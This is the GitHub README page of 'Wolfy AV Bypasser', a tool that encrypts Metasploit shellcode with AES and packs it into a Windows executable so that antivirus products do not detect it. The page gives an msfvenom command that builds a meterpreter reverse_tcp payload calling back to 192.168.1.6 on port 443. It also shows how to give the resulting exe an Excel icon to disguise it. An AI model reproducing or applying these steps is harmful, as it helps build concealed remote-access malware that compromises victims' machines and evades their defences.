Skip to content

ferreiraklet/wolfy

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

27 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Wolfy AV Bypasser


Wolfy is a tool which bypass AVs by using a crypter + the tool Condor from mrempy/Condor

Features

  • Custom shellcodes with metasploit
  • AES Encryption
  • Can be used in Linux and Windows
  • Can be used with covenant

Usage

python3 wolfy.py -h

usage: wolfy.py [-h] -s SHELLCODE [-i ICON] -n EXENAME

optional arguments:
  -h, --help            show this help message and exit
  -s SHELLCODE, --shellcode SHELLCODE
                        .bin shellcode file
  -i ICON, --icon ICON  icon of exe
  -n EXENAME, --name EXENAME
                        .exe name

1. Generate a shellcode with msfvenom following this structure ->

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.6 LPORT=443 -f raw -o shellcode.bin

Note: You can generate whatever metasploit payload you want.

2. Install the dependences

If you are in linux, execute sudo bash install.sh

If you are in Windows, execute pip install pycryptodome pyinstaller tinyaes colorama Cython

3. Run wolfy.py

python3 wolfy.py -s shellcode.bin -i excel -n myexename

Special Thanks to mrempy

See

Condor

About

Wolfy AV Bypasser

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages